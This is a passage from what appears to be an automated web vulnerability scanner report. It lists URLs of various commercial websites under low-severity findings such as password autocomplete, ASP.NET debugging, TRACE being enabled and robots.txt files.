7.322. http://lilypad-cdn.cranberry.com/img/c4a97332-d896-4e47-9a95-048dc2ed0f10/60/jleonard.jpg

7.323. http://lilypad-cdn.cranberry.com/img/d6364566-fb9d-4ddf-849b-16d264dabff6/60/fernleynews.jpg

7.324. http://lilypad-cdn.cranberry.com/img/d9d8a566-1e7c-462c-86b0-4303e44608b2/60/vois.jpg

7.325. http://lilypad-cdn.cranberry.com/img/e7c5104e-5c43-4d89-8e90-7c463f837121/60/stevenwyer.jpg

7.326. http://lilypad-cdn.cranberry.com/img/e846f474-057b-4233-9640-0e2f0b1f112a/60/katewalling.jpg

7.327. http://lilypad-cdn.cranberry.com/img/f3629ed1-6277-428b-9e8a-e8456fd83831/60/scouthomestaging.jpg

7.328. http://lilypad-cdn.cranberry.com/img/fdb40132-b27e-4150-a8ca-1d4473987cdc/60/affiliatetip.jpg

7.329. http://lilypad-cdn.cranberry.com/img/fe936a40-7d28-4120-ad40-ba37b97b26f1/60/otrtiresupply.jpg

7.330. http://lilypad.cranberry.com/css/osxModal.css

7.331. http://lilypad.cranberry.com/js/jquery.simplemodal-1.3.3.min.js

7.332. http://lilypad.cranberry.com/js/osxModal.js

7.333. http://lilypad.cranberry.com/person/new

7.334. http://load.exelator.com/load/

7.335. http://loadm.exelator.com/load/

7.336. https://login.live.com/login.srf

7.337. https://login.live.com/ppsecure/post.srf

7.338. https://login.oracle.com/favicon.ico

7.339. https://login.oracle.com/mysso/signon.jsp

7.340. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login

7.341. https://login.oracle.com/sso/auth

7.342. https://login.oracle.com/sso_loginui/feed-icon-14x14.png

7.343. https://login.oracle.com/sso_loginui/go_button.gif

7.344. https://login.oracle.com/sso_loginui/hp_spacer.gif

7.345. https://login.oracle.com/sso_loginui/moc_lib.js

7.346. https://login.oracle.com/sso_loginui/oracle.css

7.347. https://login.oracle.com/sso_loginui/oralogo_small.gif

7.348. https://login.oracle.com/sso_loginui/sso_check.js

7.349. http://maps.google.com/maps

7.350. http://maps.google.com/maps/gen_204

7.351. http://maps.google.com/maps/nav

7.352. http://maps.google.com/maps/vp

7.353. https://mix.oracle.com/

7.354. https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx

7.355. http://networksolutions.112.2o7.net/b/ss/netsolglobal/1/H.21.1/s14008630060125

7.356. http://networksolutions.112.2o7.net/b/ss/netsolglobal/1/H.21.1/s19329686376731

7.357. http://now.eloqua.com/visitor/v200/svrGP.aspx

7.358. http://odb.outbrain.com/utils/get

7.359. http://odb.outbrain.com/utils/get

7.360. http://odb.outbrain.com/utils/get

7.361. http://odb.outbrain.com/utils/get

7.362. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s53765518721193

7.363. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s55347714372910

7.364. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s55552479997

7.365. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s56072562700137

7.366. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oracleotnlive/1/H.19.4/s58862111601047

7.367. http://peoplepond.com/

7.368. http://peoplepond.com/_mint/

7.369. http://peoplepond.com/favicon.ico

7.370. http://pix04.revsci.net/D10889/b3/0/3/noscript.gif

7.371. http://pix04.revsci.net/D10889/b3/0/3/noscript.gif

7.372. http://pixel.quantserve.com/pixel

7.373. http://pixel.rubiconproject.com/tap.php

7.374. http://plancast.com/p/3zbp

7.375. https://profile.microsoft.com/RegSysProfileCenter/wizard.aspx

7.376. http://r.turn.com/r/bd

7.377. http://r1-ads.ace.advertising.com/site=743260/size=300250/u=2/bnum=73260642/xsxdata=1:93182371/hr=11/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.winamp.com%252F

7.378. http://safebrowsing.clients.google.com/safebrowsing/downloads

7.379. http://safebrowsing.clients.google.com/safebrowsing/gethash

7.380. http://segment-pixel.invitemedia.com/pixel

7.381. http://segment-pixel.invitemedia.com/set_partner_uid

7.382. http://segment-pixel.invitemedia.com/unpixel

7.383. http://segments.adap.tv/data

7.384. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543557/sid.6543551/sid.6543598

7.385. http://server.iad.liveperson.net/hc/43040610/

7.386. http://server.iad.liveperson.net/hc/43040610/

7.387. http://server.iad.liveperson.net/hc/43040610/

7.388. http://stats.cafepress.com/b/ss/cafepresscom/1/H.2-pdv-2/s34579009918961

7.389. http://stats.manticoretechnology.com/Data/447/7993/AD0FEDA3-8777-48C4-97A7-A1999E9FA90D/mtcLogData.asp

7.390. http://tacoda.at.atwola.com/rtx/r.js

7.391. http://tags.bluekai.com/site/918

7.392. http://tags.crwdcntrl.net/5/c=244/b=2252612

7.393. http://tags.crwdcntrl.net/5/c=244/b=2252618

7.394. http://tags.crwdcntrl.net/5/c=244/b=2253465

7.395. http://tags.crwdcntrl.net/5/c=25/b=1225394

7.396. http://tags.crwdcntrl.net/5/c=25/b=1225400

7.397. http://tags.crwdcntrl.net/5/c=25/b=1226041

7.398. http://telligent.com/

7.399. http://telligent.com/Custom/Images/ajax-spinner-circle.gif

7.400. http://telligent.com/Custom/Scripts/FormUtils.js

7.401. http://telligent.com/Custom/Scripts/SearchPhraseManager.js

7.402. http://telligent.com/CustomFooterFragments/scripts/jquery.jfeed.pack.js

7.403. http://telligent.com/SyntaxHighlighter/scripts/shAutoloader.js

7.404. http://telligent.com/SyntaxHighlighter/scripts/shCore.js

7.405. http://telligent.com/SyntaxHighlighter/styles/shCore.css

7.406. http://telligent.com/SyntaxHighlighter/styles/shThemeDefault.css

7.407. http://telligent.com/Themes/Custom/Images/spacer.gif

7.408. http://telligent.com/Themes/Custom/images/icon-email-white.gif

7.409. http://telligent.com/Themes/Custom/images/logo-ta-med.png

7.410. http://telligent.com/Themes/Custom/images/logo-tc-med.png

7.411. http://telligent.com/Themes/Custom/images/logo-te-med.png

7.412. http://telligent.com/Themes/Custom/images/partners-page-learnmore-background.png

7.413. http://telligent.com/Themes/Custom/images/products-page-logo-tc.png

7.414. http://telligent.com/Utility/ContentFragments/CMS/ContentMenu.js

7.415. http://telligent.com/Utility/ContentFragments/CMS/ContentMenuAjax.asmx

7.416. http://telligent.com/Utility/FooterFragments/Core/UserInfoPopup.js

7.417. http://telligent.com/Utility/FooterFragments/Core/UserInfoPopupAjax.asmx

7.418. http://telligent.com/Utility/HeaderFragments/CMS/suckerfish.css

7.419. http://telligent.com/Utility/HeaderFragments/CMS/suckerfish.js

7.420. http://telligent.com/Utility/HeaderFragments/Core/GroupNavigation.js

7.421. http://telligent.com/Utility/HeaderFragments/Core/GroupNavigationAjax.asmx

7.422. http://telligent.com/Utility/HeaderFragments/Core/Search.js

7.423. http://telligent.com/Utility/HeaderFragments/Core/SearchAjax.asmx

7.424. http://telligent.com/WebResource.axd

7.425. http://telligent.com/analytics.ashx

7.426. http://telligent.com/cfs-file.ashx/__key/CommunityServer.Components.SiteFiles/TelligentLogo.png

7.427. http://telligent.com/community/

7.428. http://telligent.com/company/

7.429. http://telligent.com/company/careers/

7.430. http://telligent.com/company/community_commitment/

7.431. http://telligent.com/company/contact_us.aspx

7.432. http://telligent.com/company/contact_us/

7.433. http://telligent.com/company/leadership/

7.434. http://telligent.com/company/news/

7.435. http://telligent.com/company/news/b/articles/archive/2011/01/17/cmswire-mobile-experience-a-key-requirement-for-communities.aspx

7.436. http://telligent.com/company/news/b/articles/archive/2011/02/17/telligent-integrates-with-sharepoint-2010.aspx

7.437. http://telligent.com/company/news/b/press_releases/archive/2011/02/10/new-customers-and-strong-demand-for-social-community-software-fuel-telligent-s-record-breaking-sales-quarter.aspx

7.438. http://telligent.com/company/news/b/press_releases/archive/2011/02/15/telligent-releases-integration-with-microsoft-sharepoint-2010.aspx

7.439. http://telligent.com/company/news/b/teamblog/

7.440. http://telligent.com/company/news/b/teamblog/archive/2011/02/10/new-customers-and-strong-demand-for-social-community-software-fuel-telligent-s-record-breaking-sales-quarter.aspx

7.441. http://telligent.com/customers.aspx

7.442. http://telligent.com/customers/

7.443. http://telligent.com/elqNow/elqCfg.js

7.444. http://telligent.com/elqNow/elqImg.js

7.445. http://telligent.com/elqNow/elqScr.js

7.446. http://telligent.com/files/media/image/buttons/RequestDemoBtn.png

7.447. http://telligent.com/files/media/image/buttons/RfpBtn.png

7.448. http://telligent.com/files/media/image/buttons/TC-UpgradeBtn-56.png

7.449. http://telligent.com/files/media/image/products/community/social-ecosystem-tc-sb2.png

7.450. http://telligent.com/files/media/image/products/community/tc-people.png

7.451. http://telligent.com/files/media/image/promos/Forrester-Promo-Best-Practices-Social-Technologies-250.png

7.452. http://telligent.com/files/media/image/promos/Forrester-Promo-Intercompany-collab-250.png

7.453. http://telligent.com/files/media/image/promos/btn-seehow-readersdig.png

7.454. http://telligent.com/files/media/image/quotes/quotes-readersdig.png

7.455. http://telligent.com/login.aspx

7.456. http://telligent.com/members/vinceford/activities/followersrss.aspx

7.457. http://telligent.com/members/vinceford/activities/groupsrss.aspx

7.458. http://telligent.com/members/vinceford/activities/rss.aspx

7.459. http://telligent.com/members/vinceford/comments/rss.aspx

7.460. http://telligent.com/partners/

7.461. http://telligent.com/privacy_policy.aspx

7.462. http://telligent.com/products/

7.463. http://telligent.com/products/request_a_demo.aspx

7.464. http://telligent.com/products/telligent_analytics/

7.465. http://telligent.com/products/telligent_enterprise/

7.466. http://telligent.com/resources/

7.467. http://telligent.com/resources/m/analysts/1343205.aspx

7.468. http://telligent.com/resources/m/analysts/1345217.aspx

7.469. http://telligent.com/resources/m/success_stories/1331597.aspx

7.470. http://telligent.com/resources/m/white_papers/

7.471. http://telligent.com/rss.aspx

7.472. http://telligent.com/services/

7.473. http://telligent.com/support/

7.474. http://telligent.com/support/analytics/

7.475. http://telligent.com/support/communityserver/

7.476. http://telligent.com/support/csevolution/

7.477. http://telligent.com/support/harvest/

7.478. http://telligent.com/support/request_an_upgrade/

7.479. http://telligent.com/support/telligent_evolution_platform/

7.480. http://telligent.com/support/telligent_evolution_platform/community/

7.481. http://telligent.com/support/telligent_evolution_platform/enterprise/

7.482. http://telligent.com/support/telligent_evolution_platform/w/documentation/

7.483. http://telligent.com/terms_of_use.aspx

7.484. http://telligent.com/themes/Custom/images/background.png

7.485. http://telligent.com/themes/Custom/images/footer-background.png

7.486. http://telligent.com/themes/Custom/images/icon-phone-white.png

7.487. http://telligent.com/themes/Custom/images/menu-tabs-background-right-corner.png

7.488. http://telligent.com/themes/Custom/images/menu-tabs-background.gif

7.489. http://telligent.com/themes/Custom/images/search-background.png

7.490. http://telligent.com/themes/Custom/images/tab-selected-home.png

7.491. http://telligent.com/themes/cms/fiji/css/DynamicStyle.aspx

7.492. http://telligent.com/themes/cms/fiji/css/fourroads-cms.css

7.493. http://telligent.com/themes/cms/fiji/css/screen.css

7.494. http://telligent.com/themes/fiji/css/base.css

7.495. http://telligent.com/themes/fiji/css/content-fragments-core.css

7.496. http://telligent.com/themes/fiji/css/content-fragments-forums.css

7.497. http://telligent.com/themes/fiji/css/content-fragments-groups.css

7.498. http://telligent.com/themes/fiji/css/content-fragments-marketplace.css

7.499. http://telligent.com/themes/fiji/css/content-fragments-mediagalleries.css

7.500. http://telligent.com/themes/fiji/css/content-fragments-messages.css

7.501. http://telligent.com/themes/fiji/css/content-fragments-weblogs.css

7.502. http://telligent.com/themes/fiji/css/content-fragments-wikis.css

7.503. http://telligent.com/themes/fiji/css/content-fragments.css

7.504. http://telligent.com/themes/fiji/css/custom.css

7.505. http://telligent.com/themes/fiji/css/footer-fragments.css

7.506. http://telligent.com/themes/fiji/css/fourroads-cms.css

7.507. http://telligent.com/themes/fiji/css/header-fragments.css

7.508. http://telligent.com/themes/fiji/css/print.css

7.509. http://telligent.com/themes/fiji/css/screen.css

7.510. http://telligent.com/themes/fiji/favicon.ico

7.511. http://telligent.com/themes/fiji/images/group-nav-bkg.gif

7.512. http://telligent.com/themes/fiji/images/group-nav-sep.gif

7.513. http://telligent.com/themes/generic/css/layout.css

7.514. http://telligent.com/themes/groups/fiji/css/DynamicStyle.aspx

7.515. http://telligent.com/utility/jquery/jquery-1.3.2.min.js

7.516. http://telligent.com/utility/loading.htm

7.517. http://trafficshaping.com/

7.518. http://trafficshaping.com/favicon.ico

7.519. http://trafficshaping.com/seo-tools

7.520. http://translate.google.com/translate_a/element.js

7.521. http://translate.googleapis.com/translate_a/l

7.522. http://twitter.com/favorites/tap11.json

7.523. http://twitter.com/watchmouse/status/35359711327031296

7.524. https://twitter.com/oauth/authenticate

7.525. http://REDACTED/iaction/00asup_HomePortal_1

7.526. http://widgets.causes.com/badges/cause

7.527. http://wstat.wibiya.com/l.jpg

7.528. http://www.adexchanger.com/email/liveintent/

7.529. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

7.530. http://www.bizographics.com/collect/

7.531. http://www.blogger.com/reviews/json/aggregates

7.532. http://www.cafepress.com/duckduckgo

7.533. http://www.companypond.com/

7.534. http://www.freefind.com/

7.535. http://www.google.com/

7.536. http://www.google.com/aclk

7.537. http://www.google.com/gen_204

7.538. http://www.google.com/search

7.539. http://www.googleadservices.com/pagead/aclk

7.540. http://www.networksolutions.com/css/gzip_1117039583/bundles/template.css

7.541. http://www.networksolutions.com/css/gzip_1497930774/bundles/domain-index.css

7.542. http://www.networksolutions.com/css/gzip_1721580421/css/print.css

7.543. http://www.networksolutions.com/css/gzip_792199742/css/lib/plugins/jquery/thickbox.css

7.544. http://www.networksolutions.com/css/gzip_N1611004770/bundles/ns0.css

7.545. http://www.networksolutions.com/css/gzip_N935989521/bundles/domain-search-results-default.css

7.546. http://www.networksolutions.com/js/gzip_1519484056/js/utils/LivePerson-mtagconfig.js

7.547. http://www.networksolutions.com/js/gzip_1706295218/bundles/omniture.js

7.548. http://www.networksolutions.com/js/gzip_N1134831222/js/lib/jquery/plugins/thickbox.js

7.549. http://www.networksolutions.com/js/gzip_N1436114336/bundles/seoforecom.js

7.550. http://www.networksolutions.com/js/gzip_N2081288211/bundles/domain-name-search-results.js

7.551. http://www.networksolutions.com/js/gzip_N766518311/bundles/domain-main.js

7.552. http://www.networksolutions.com/js/gzip_N844206633/bundles/template.js

7.553. http://www.networksolutions.com/js/gzip_N85535608/bundles/ns0.js

7.554. http://www.oracle.com/pls/www/go.lp

7.555. http://www.project-syndicate.org/create_captcha

7.556. http://www.stowetel.net/favicon.ico

7.557. http://www.trafficshaping.com/_mint/

7.558. http://www.virtusa.com/aboutus/advisory-board.asp

7.559. http://www.virtusa.com/aboutus/awards-and-certifications.asp

7.560. http://www.virtusa.com/aboutus/company-overview.asp

7.561. http://www.virtusa.com/aboutus/management-board.asp

7.562. http://www.virtusa.com/aboutus/our-offices.asp

7.563. http://www.virtusa.com/aboutus/why-virtusa.asp

7.564. http://www.virtusa.com/applications/userlogin/freedownload.asp

7.565. http://www.virtusa.com/btrc/default.asp

7.566. http://www.virtusa.com/careers/campus-reach-initiative.asp

7.567. http://www.virtusa.com/careers/open-positions.asp

7.568. http://www.virtusa.com/careers/our-values.asp

7.569. http://www.virtusa.com/careers/why-virtusa.asp

7.570. http://www.virtusa.com/careers/work-environment.asp

7.571. http://www.virtusa.com/clients/

7.572. http://www.virtusa.com/contactus/

7.573. http://www.virtusa.com/default.asp

7.574. http://www.virtusa.com/ftbu/

7.575. http://www.virtusa.com/ftbu/aboutus/default.asp

7.576. http://www.virtusa.com/ftbu/aboutus/our-offices.asp

7.577. http://www.virtusa.com/ftbu/careers/default.asp

7.578. http://www.virtusa.com/ftbu/contactus/default.asp

7.579. http://www.virtusa.com/ftbu/default.asp

7.580. http://www.virtusa.com/ftbu/newsroom/article.asp

7.581. http://www.virtusa.com/ftbu/newsroom/default.asp

7.582. http://www.virtusa.com/ftbu/ouradvantage/business-insight.asp

7.583. http://www.virtusa.com/ftbu/ouradvantage/methodology.asp

7.584. http://www.virtusa.com/ftbu/ouradvantage/technologies.asp

7.585. http://www.virtusa.com/ftbu/ourclients/client-list.asp

7.586. http://www.virtusa.com/ftbu/privacy-statement.asp

7.587. http://www.virtusa.com/ftbu/search/result.asp

7.588. http://www.virtusa.com/ftbu/services/business_process/business-intelligence.asp

7.589. http://www.virtusa.com/ftbu/services/business_process/claims-management.asp

7.590. http://www.virtusa.com/ftbu/services/business_process/commissions-management.asp

7.591. http://www.virtusa.com/ftbu/services/business_process/consolidation.asp

7.592. http://www.virtusa.com/ftbu/services/business_process/default.asp

7.593. http://www.virtusa.com/ftbu/services/business_process/integrated-process-modeling.asp

7.594. http://www.virtusa.com/ftbu/services/business_process/management-accounting.asp

7.595. http://www.virtusa.com/ftbu/services/business_process/payment-processes.asp

7.596. http://www.virtusa.com/ftbu/services/business_process/policy-management.asp

7.597. http://www.virtusa.com/ftbu/services/implementation-method/business-engineering.asp

7.598. http://www.virtusa.com/ftbu/services/implementation-method/change-management.asp

7.599. http://www.virtusa.com/ftbu/services/implementation-method/default.asp

7.600. http://www.virtusa.com/ftbu/services/implementation-method/project-management.asp

7.601. http://www.virtusa.com/ftbu/services/implementation-method/quality-management.asp

7.602. http://www.virtusa.com/ftbu/services/implementation-method/software-selection.asp

7.603. http://www.virtusa.com/ftbu/services/technology/default.asp

7.604. http://www.virtusa.com/ftbu/services/technology/industries/default.asp

7.605. http://www.virtusa.com/ftbu/services/technology/industries/sap-is-t-rm-ca.asp

7.606. http://www.virtusa.com/ftbu/services/technology/industries/sap-is-u.asp

7.607. http://www.virtusa.com/ftbu/services/technology/industries/sap-ps-cd.asp

7.608. http://www.virtusa.com/ftbu/services/technology/industries/sap-trm.asp

7.609. http://www.virtusa.com/ftbu/services/technology/insurance/default.asp

7.610. http://www.virtusa.com/ftbu/services/technology/insurance/sap-alice.asp

7.611. http://www.virtusa.com/ftbu/services/technology/insurance/sap-fs-cd.asp

7.612. http://www.virtusa.com/ftbu/services/technology/insurance/sap-fs-cm.asp

7.613. http://www.virtusa.com/ftbu/services/technology/insurance/sap-fs-icm.asp

7.614. http://www.virtusa.com/ftbu/services/technology/insurance/sap-fs-pm.asp

7.615. http://www.virtusa.com/ftbu/services/technology/insurance/sap-fs-ri.asp

7.616. http://www.virtusa.com/ftbu/services/technology/integration-sap-non-sap.asp

7.617. http://www.virtusa.com/ftbu/services/technology/maintenance.asp

7.618. http://www.virtusa.com/ftbu/services/technology/system-migration.asp

7.619. http://www.virtusa.com/ftbu/services/technology/upgrades.asp

7.620. http://www.virtusa.com/ftbu/sitemap.asp

7.621. http://www.virtusa.com/ftbu/terms-conditions.asp

7.622. http://www.virtusa.com/industries/banking-financial-services/

7.623. http://www.virtusa.com/industries/communications/

7.624. http://www.virtusa.com/industries/high-technology/

7.625. http://www.virtusa.com/industries/independent-software-vendors/

7.626. http://www.virtusa.com/industries/insurance/

7.627. http://www.virtusa.com/industries/media-information-entertainment/

7.628. http://www.virtusa.com/industries/pharmaceuticals/

7.629. http://www.virtusa.com/investors/SEC_filings.asp

7.630. http://www.virtusa.com/investors/annual_report_and_proxy_statement.asp

7.631. http://www.virtusa.com/investors/corporate_governance.asp

7.632. http://www.virtusa.com/investors/default.asp

7.633. http://www.virtusa.com/investors/investor_contact.asp

7.634. http://www.virtusa.com/investors/stock_information.asp

7.635. http://www.virtusa.com/newsroom/article.asp

7.636. http://www.virtusa.com/newsroom/default.asp

7.637. http://www.virtusa.com/newsroom/events.asp

7.638. http://www.virtusa.com/newsroom/in-the-media.asp

7.639. http://www.virtusa.com/newsroom/press-releases.asp

7.640. http://www.virtusa.com/platforming/overview.asp

7.641. http://www.virtusa.com/platforming/platforming-best-practices.asp

7.642. http://www.virtusa.com/platforming/why-platforming.asp

7.643. http://www.virtusa.com/practices/bpm/

7.644. http://www.virtusa.com/practices/bpm/default.asp

7.645. http://www.virtusa.com/practices/dwbi/

7.646. http://www.virtusa.com/practices/dwbi/center-of-excellence/default.asp

7.647. http://www.virtusa.com/practices/dwbi/default.asp

7.648. http://www.virtusa.com/practices/dwbi/service-offerings/default.asp

7.649. http://www.virtusa.com/practices/dwbi/technology-and-alliances/default.asp

7.650. http://www.virtusa.com/practices/ecm/

7.651. http://www.virtusa.com/practices/ecm/default.asp

7.652. http://www.virtusa.com/practices/software-testing/

7.653. http://www.virtusa.com/practices/software-testing/core-testing/default.asp

7.654. http://www.virtusa.com/practices/software-testing/default.asp

7.655. http://www.virtusa.com/practices/software-testing/test-consultancy/default.asp

7.656. http://www.virtusa.com/practices/software-testing/tools-expertise.asp

7.657. http://www.virtusa.com/privacy-statement.asp

7.658. http://www.virtusa.com/resources/agile-software-development.asp

7.659. http://www.virtusa.com/resources/application-consolidation.asp

7.660. http://www.virtusa.com/resources/application-development-services.asp

7.661. http://www.virtusa.com/resources/application-rationalization.asp

7.662. http://www.virtusa.com/resources/automated-software-test.asp

7.663. http://www.virtusa.com/resources/business-technology-services.asp

7.664. http://www.virtusa.com/resources/custom-software-development.asp

7.665. http://www.virtusa.com/resources/development-outsourcing.asp

7.666. http://www.virtusa.com/resources/it-application-maintenance.asp

7.667. http://www.virtusa.com/resources/it-consolidation.asp

7.668. http://www.virtusa.com/resources/it-consulting-company.asp

7.669. http://www.virtusa.com/resources/it-consulting-outsourcing.asp

7.670. http://www.virtusa.com/resources/it-consulting-services.asp

7.671. http://www.virtusa.com/resources/it-offshoring.asp

7.672. http://www.virtusa.com/resources/lean-it.asp

7.673. http://www.virtusa.com/resources/offshore-development.asp

7.674. http://www.virtusa.com/resources/offshore-outsourcing-services.asp

7.675. http://www.virtusa.com/resources/outsource-software-development.asp

7.676. http://www.virtusa.com/resources/outsourcing-services.asp

7.677. http://www.virtusa.com/resources/performance-testing-tools.asp

7.678. http://www.virtusa.com/resources/software-development-company.asp

7.679. http://www.virtusa.com/resources/software-outsourcing-company.asp

7.680. http://www.virtusa.com/resources/software-test-automation.asp

7.681. http://www.virtusa.com/resources/software-test-management.asp

7.682. http://www.virtusa.com/resources/technology-outsourcing.asp

7.683. http://www.virtusa.com/rssfeeds/default.asp

7.684. http://www.virtusa.com/search/result.asp

7.685. http://www.virtusa.com/services/application-development/

7.686. http://www.virtusa.com/services/consulting/

7.687. http://www.virtusa.com/services/legacy-asset-management/

7.688. http://www.virtusa.com/services/product-development/

7.689. http://www.virtusa.com/sitemap.asp

7.690. http://www.virtusa.com/terms-conditions.asp

8. Password field with autocomplete enabled

8.1. https://accounts.zoho.com/login

8.2. https://accounts.zoho.com/register

8.3. http://bad-behavior.ioerror.us/wp-login.php

8.4. http://bnxs.com/

8.5. http://bnxs.com/how-to-start-your-own-url-shortening-service/

8.6. http://bnxs.com/wp-includes/js/tinymce/plugins/wordpress/wordpress.css

8.7. https://cds.sun.com/is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_us/-/USD/ViewProductDetail-Start

8.8. https://client.trafficshaping.com/signin

8.9. http://dev.qwerly.com/member/register

8.10. http://forums.winamp.com/

8.11. http://forums.winamp.com/forumdisplay.php

8.12. http://forums.winamp.com/login.php

8.13. http://hootsuite.com/

8.14. http://lilypad.cranberry.com/person/new

8.15. http://lilypad.cranberry.com/person/new

8.16. https://login.silverlight.net/login/signin.aspx

8.17. http://mail.ioerror.us/mailman/listinfo/bad-behavior

8.18. http://mail.ioerror.us/mailman/listinfo/bad-behavior

8.19. http://mail.ioerror.us/mailman/listinfo/bad-behavior-announce

8.20. http://mail.ioerror.us/mailman/listinfo/bad-behavior-announce

8.21. https://shop.winamp.com/store

8.22. http://telligent.com/login.aspx

8.23. http://telligent.com/login.aspx

8.24. http://trafficshaping.com/

8.25. https://twitter.com/oauth/authenticate

8.26. http://www.capgemini.com/registration/register/

8.27. https://www.fusionbot.com/login.asp

8.28. http://www.project-syndicate.org/

8.29. http://www.project-syndicate.org/commentary/ashour1/English

8.30. http://www.project-syndicate.org/commentary/ashour1/English

8.31. http://www.project-syndicate.org/commentary/fischer60/English

8.32. http://www.project-syndicate.org/commentary/fischer60/English

8.33. http://www.project-syndicate.org/contributor/1608

8.34. http://www.project-syndicate.org/contributor/886

8.35. http://www.project-syndicate.org/register

8.36. http://www.project-syndicate.org/register

8.37. http://www.project-syndicate.org/series/finance_in_the_21st_century/description

8.38. http://www.project-syndicate.org/series_metacategory/1

8.39. http://www.project-syndicate.org/series_metacategory/3

8.40. http://www.sitelevel.com/

8.41. http://www.watchmouse.com/en/

8.42. http://www.watchmouse.com/en/

8.43. http://www.watchmouse.com/en/contact.php

8.44. http://www.watchmouse.com/en/plans_price.php

9. ASP.NET debugging enabled

9.1. http://usage.apps.conduit-services.com/Default.aspx

9.2. http://www.leadlife.com/Default.aspx

9.3. http://www.sti-world.com/Default.aspx

10. File upload functionality

10.1. http://jigsaw.w3.org/css-validator/

10.2. http://sstatic.net/Js/wmd.js

11. TRACE method is enabled

11.1. http://adam.companypond.com/

11.2. http://b.aol.com/

11.3. http://b.winamp.com/

11.4. http://blog.qwerly.com/

11.5. http://capgeminicom.112.2o7.net/

11.6. http://capgeminicomglobal.112.2o7.net/

11.7. https://client.trafficshaping.com/

11.8. http://companypond.com/

11.9. http://creativecommons.org/

11.10. http://forums.winamp.com/

11.11. http://image2.pubmatic.com/

11.12. http://jigsaw.w3.org/

11.13. http://lilypad-cdn.cranberry.com/

11.14. http://lilypad.cranberry.com/

11.15. https://login.oracle.com/

11.16. http://mail.ioerror.us/

11.17. https://mix.oracle.com/

11.18. http://networksolutions.112.2o7.net/

11.19. http://o.sa.aol.com/

11.20. http://peoplepond.com/

11.21. http://referrals.fusionbot.com/

11.22. http://segs.btrll.com/

11.23. http://statistics.wibiya.com/

11.24. http://tacoda.at.atwola.com/

11.25. http://tetlaw.id.au/

11.26. http://widgets.digg.com/

11.27. http://wstat.wibiya.com/

11.28. http://www.companypond.com/

11.29. http://www.cranberryventurepartners.com/

11.30. http://www.fusionbot.com/

11.31. https://www.fusionbot.com/

11.32. http://www.opengroup.org/

11.33. http://www.sti-seoservices.com/

12. Robots.txt file

12.1. http://ads.undertone.com/afr.php

12.2. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0

12.3. http://api.qwerly.com/v1/facebook/username/someone

12.4. http://api.search.live.net/json.aspx

12.5. http://ar.atwola.com/atd

12.6. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=125x125

12.7. http://blog.qwerly.com/

12.8. http://bs.serving-sys.com/BurstingPipe/adServer.bs

12.9. http://capgeminicom.112.2o7.net/crossdomain.xml

12.10. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s96224887147545

12.11. http://cdn.cloudscan.us/

12.12. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

12.13. http://cloudscan.us/

12.14. http://cm.g.doubleclick.net/pixel

12.15. http://code.google.com/p/swfobject/

12.16. http://creativecommons.org/licenses/by-sa/2.5/

12.17. http://cspix.media6degrees.com/orbserv/hbpix

12.18. http://dev.qwerly.com/

12.19. http://developer.klout.com/

12.20. http://discuss.zoho.com/getCustomFile.do

12.21. http://drh.img.digitalriver.com/store

12.22. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_4_5_18/StdBanner.js

12.23. http://duck.co/jsp/i18nConstants.jsp

12.24. https://duckduckgo.com/e.js

12.25. http://edge.quantserve.com/quant.js

12.26. https://event.on24.com/eventRegistration/EventLobbyServlet

12.27. http://forums.winamp.com/clientscript/yui/yahoo-dom-event/yahoo-dom-event.js

12.28. http://go.microsoft.com/fwlink/

12.29. http://i2.duck.co/i/sports.espn.go.com.ico

12.30. http://jigsaw.w3.org/css-validator/

12.31. http://klout.com/

12.32. http://linkhelp.clients.google.com/tbproxy/lh/fixurl

12.33. http://loadm.exelator.com/load/

12.34. https://login.live.com/pp1000/CSS/WEBwhitegray1033.css

12.35. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur

12.36. http://networksolutions.112.2o7.net/b/ss/netsolglobal/1/H.21.1/s19329686376731

12.37. http://now.eloqua.com/visitor/v200/svrGP.aspx

12.38. http://o.sa.aol.com/b/ss/aoltechcrunch,aolsvc/1/H.21/s68993670598138

12.39. http://qwerly.com/

12.40. http://s.gravatar.com/js/gprofiles.js

12.41. http://s0.wp.com/wp-content/themes/h4/global.css

12.42. http://s1.wp.com/wp-includes/js/jquery/jquery.js

12.43. http://s2.wp.com/wp-content/themes/vip/tctechcrunch/style.css

12.44. http://s7.addthis.com/js/250/addthis_widget.js

12.45. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY-OUCIPzlAjIF-LIAAB8

12.46. http://safebrowsing.clients.google.com/safebrowsing/downloads

12.47. http://services.winamp.com/ivw/get

12.48. http://shop.winamp.com/store

12.49. https://shop.winamp.com/store

12.50. http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/lqIx_MUkbGi.css

12.51. http://static02.linkedin.com/scds/common/u/img/sprite/sprite_connect_v6.png

12.52. http://statistics.wibiya.com/SetToolbarLoad.php

12.53. http://tags.crwdcntrl.net/5/c=25/b=1225400

12.54. http://techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/

12.55. http://telligent.com/products/telligent_community/

12.56. http://tetlaw.id.au/view/blog/prototype-class-fastinit/

